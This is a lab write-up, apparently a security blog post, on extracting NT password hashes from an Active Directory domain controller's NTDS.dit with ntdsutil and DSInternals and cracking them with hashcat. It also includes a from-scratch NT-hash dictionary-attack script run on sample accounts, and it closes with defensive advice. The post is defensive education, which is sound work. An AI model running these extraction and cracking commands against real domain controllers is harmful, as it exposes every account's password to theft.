Introduction
Understanding how Active Directory password hashes can be extracted and cracked is essential knowledge for any security engineer or penetration tester. This post walks through the exact steps I used in my lab environment to extract the NTDS.dit database from a Domain Controller, convert the hashes into a format Hashcat can use, and run a cracking session on a Windows machine.
This is not a guide for attacking real environments. It is a practical lab exercise to understand the attack chain — so you know what to defend against.
⚠ Disclaimer: Only perform these steps on systems you own or have explicit written permission to test. Extracting and cracking credentials from systems without authorization is illegal under the Computer Crime Act (Wet Computercriminaliteit) and equivalent laws in most jurisdictions. This post is intended for authorized penetration testing and lab use only.
Why This Matters
The NT hash behind NTLM is dangerously fast to compute: it is a single unsalted MD4 over the password, with no per-user salt and no iteration count. Hashcat benchmarks a single gaming GPU such as the RTX 3090 used in this lab at well over 100 billion NTLM candidates per second, so the entire rockyou.txt wordlist (14 million passwords) is exhausted in a fraction of a second. Because there is no salt, every candidate is also tested against every account in the dump at once. If your organization still relies on NTLM and weak passwords, a compromised DC means every account password is at risk.
The takeaway for defenders: enforce long passphrases (14+ characters), disable NTLM where possible, and use Kerberos with AES encryption. For service accounts, use group Managed Service Accounts (gMSA), which get long random passwords that are rotated automatically.
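To make the speed argument concrete, the script below builds the NT hash from scratch (MD4 over the UTF-16LE encoding of the password) and runs the same kind of dictionary attack hashcat performs in mode 1000 against a handful of lab accounts. It is an added illustration written for this post, not code from the original article and not how hashcat is implemented. The account names, their passwords and the wordlist are constructed sample data; the two literal hash values are the well-known NT hashes of the empty password and of "password".

```python
"""Added illustration: NT hash construction and a hashcat-style (-m 1000 -a 0)
dictionary attack written from scratch. Not hashcat's code and not part of the
original post; accounts, passwords and wordlist below are constructed samples."""
import struct
from typing import Dict, Iterable, List


def _rotl(x: int, n: int) -> int:
    """Rotate a 32-bit word left by n bits."""
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320: three rounds of 16 steps per 64-byte block."""
    mask = 0xFFFFFFFF
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476

    # Padding: one 0x80 byte, zeros up to 56 mod 64, then the bit length as little-endian u64
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # (round function, additive constant, per-step shifts, message word order) per round
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for func, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates the right one
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)): no salt, no iterations, hence the speed."""
    return md4(password.encode("utf-16-le")).hex()


def dictionary_attack(targets: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """What hashcat -m 1000 -a 0 does: hash each candidate once and look it up
    against all target hashes at the same time. Returns {hash: plaintext}."""
    remaining = set(targets)
    found: Dict[str, str] = {}
    for candidate in wordlist:
        if not remaining:
            break
        digest = nt_hash(candidate)
        if digest in remaining:
            found[digest] = candidate
            remaining.discard(digest)
    return found


def crack_accounts(accounts: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Map cracked hashes back to account names; this mapping is lost if only bare hashes are exported."""
    found = dictionary_attack(accounts.values(), wordlist)
    return {user: found[h] for user, h in accounts.items() if h in found}


# Constructed sample data (hypothetical lab accounts, not from any real domain).
# The two literal hashes are the well-known NT hashes of "" and "password".
SAMPLE_ACCOUNTS: Dict[str, str] = {
    "Administrator": nt_hash("C0rrect-Horse-Battery-Staple-2025"),  # not in the wordlist
    "svc_backup": "8846f7eaee8fb117ad06bdd830b7586c",                # "password"
    "j.doe": nt_hash("Summer2023"),
    "a.smith": nt_hash("Summer2023"),  # same password as j.doe -> identical hash (no salt)
    "Guest": "31d6cfe0d16ae931b73c59d7e0c089c0",                     # empty password
}
SAMPLE_WORDLIST: List[str] = ["123456", "password", "Welcome1", "Summer2023", ""]

if __name__ == "__main__":
    cracked = crack_accounts(SAMPLE_ACCOUNTS, SAMPLE_WORDLIST)
    for user, hash_value in SAMPLE_ACCOUNTS.items():
        status = repr(cracked[user]) if user in cracked else "not cracked"
        print(f"{user:<14} {hash_value}  {status}")
```

Two things to notice when you run it: j.doe and a.smith have byte-identical hashes because NT hashes are unsalted, so one lookup cracks both accounts, and the only account that survives is the one with a long passphrase that no wordlist contains. The `crack_accounts` step is also why keeping the account name next to each hash during export matters: a file of bare hashes tells you that a password was cracked, but not whose.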
Lab Setup
| Component | Details |
|---|---|
| Domain Controller OS | Windows Server (dev VM) |
| Hashcat machine OS | Windows 11 |
| GPU | NVIDIA GeForce RTX 3090 (24 GB) |
| Hashcat version | 7.1.2 |
| Hash mode | 1000 (NTLM) |
| Wordlist | rockyou.txt (14.3M passwords) |
Phase 1 – Extract NTDS.dit from the Domain Controller
The NTDS.dit file is held open by the directory service while the DC is running, so you cannot simply copy it. The cleanest way is the Install From Media (IFM) function of ntdsutil, which takes a consistent offline snapshot of the database and also exports the SYSTEM registry hive; that hive holds the boot key needed to decrypt the password hashes.
Note: Microsoft Defender was disabled on the Domain Controller for this lab, because it will flag IFM creation. AV bypass is a different blog post.
First, create an output folder:
mkdir C:\Temp\dump
Then extract using ntdsutil:
ntdsutil "ac i ntds" "ifm" "create full C:\Temp\dump" q q
After it completes, verify both files are present:
C:\Temp\dump\Active Directory\ntds.dit
C:\Temp\dump\registry\SYSTEM
Transfer the entire C:\Temp\dump folder to your Hashcat machine.
Phase 2 – Extract NT Hashes with DSInternals
On the Hashcat machine, use the DSInternals PowerShell module to extract the NT hashes directly into Hashcat format.
Install the module:
Install-Module DSInternals -Force
If you get an execution policy error:
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
Import the module and change into the dump folder:
Import-Module DSInternals
cd C:\Temp\dump
Extract hashes:
# The boot key from the exported SYSTEM hive is needed to decrypt the hashes in ntds.dit
$key = Get-BootKey -SystemHivePath .\registry\SYSTEM
# Read every account from the offline database and write its NT hash as lowercase hex, one per line
Get-ADDBAccount -All -DBPath ".\Active Directory\ntds.dit" -BootKey $key |
Where-Object { $null -ne $_.NTHash } |
ForEach-Object {
[System.BitConverter]::ToString($_.NTHash).Replace("-","").ToLower()
} | Set-Content nt_hashes.txt -Encoding ASCII
Verify the output looks correct (32-character hex strings, one per line):
Get-Content nt_hashes.txt | Select-Object -First 5
# Example output (the exact values depend on your lab):
31d6cfe0d16ae931b73c59d7e0c089c0
8846f7eaee8fb117ad06bdd830b7586c
The first value is the NT hash of an empty password, which you will see for accounts that have no password set; the second is the NT hash of "password". If you see aad3b435b51404eeaad3b435b51404ee, that is the LM hash of an empty password, not an NT hash, and it does not belong in this file. Note that this file contains bare hashes, so cracked results cannot be tied back to accounts; if you need that, write SamAccountName:hash lines instead and add --username to every hashcat command below.
Phase 3 – Crack with Hashcat
Download hashcat from https://hashcat.net/hashcat/ and extract it to C:\Tools.
Download rockyou.txt, used here as the example wordlist, from https://weakpass.com/wordlists/rockyou.txt and place it in C:\Temp\dump.
Navigate to your Hashcat folder and run a dictionary attack using mode 1000 (NTLM):
cd C:\tools\hashcat-7.1.2
.\hashcat.exe -m 1000 C:\Temp\dump\nt_hashes.txt C:\Temp\dump\rockyou.txt
Once the session finishes, view the cracked results (hashcat reads them back from its potfile, so nothing is recomputed):
.\hashcat.exe -m 1000 C:\Temp\dump\nt_hashes.txt --show
# Output format: hash:plaintext, for example
8846f7eaee8fb117ad06bdd830b7586c:password
If you know roughly what passwords you set in your dev environment and have the time, you can also run a mask (brute-force) attack. A mask fixes the exact length: ?a?a?a?a?a?a?a?a tries only 8-character passwords, so add --increment if you also want shorter ones. The full printable-ASCII keyspace at length 8 is 95^8 (about 6.6 quadrillion) candidates, a matter of hours on this GPU; every extra character multiplies that by 95, which is exactly why the 14+ character advice above holds.
# All printable ASCII characters, exactly 8 characters
.\hashcat.exe -m 1000 C:\Temp\dump\nt_hashes.txt -a 3 ?a?a?a?a?a?a?a?a -O
# Lowercase letters only, exactly 8 characters (26^8 candidates, seconds on this GPU)
.\hashcat.exe -m 1000 C:\Temp\dump\nt_hashes.txt -a 3 ?l?l?l?l?l?l?l?l -O
Conclusion
NTLM hashes extracted from a Domain Controller can be cracked at extraordinary speed on commodity hardware. This lab exercise demonstrates why NTLM is considered a weak credential storage mechanism and why organizations should enforce long, complex passphrases, restrict NTLM authentication, and monitor for NTDS extraction attempts using tools like Microsoft Defender for Identity.
If you want to detect this kind of activity in your environment, check out my post on setting up Microsoft Defender for Identity.